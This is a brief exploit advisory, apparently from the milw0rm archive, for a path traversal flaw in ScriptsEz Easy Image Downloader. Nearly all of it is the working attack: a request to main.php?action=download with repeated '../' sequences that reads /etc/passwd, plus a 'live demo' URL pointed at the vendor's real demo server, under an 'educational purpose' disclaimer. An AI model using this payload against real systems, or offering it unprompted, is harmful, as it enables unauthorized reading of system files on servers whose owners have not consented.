# ScriptsEz Easy Image Downloader Local File Download Vulnerability # url: http://www.scriptsez.net/ # # Author: JosS # mail: sys-project[at]hotmail[dot]com # site: http://spanish-hackers.com # team: Spanish Hackers Team - [SHT] # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. PoC: /main.php?action=download&id=[FILE] Exploit: /main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd live demo: http://demo.scriptsez.net/easy_image/main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd # milw0rm.com [2008-10-09]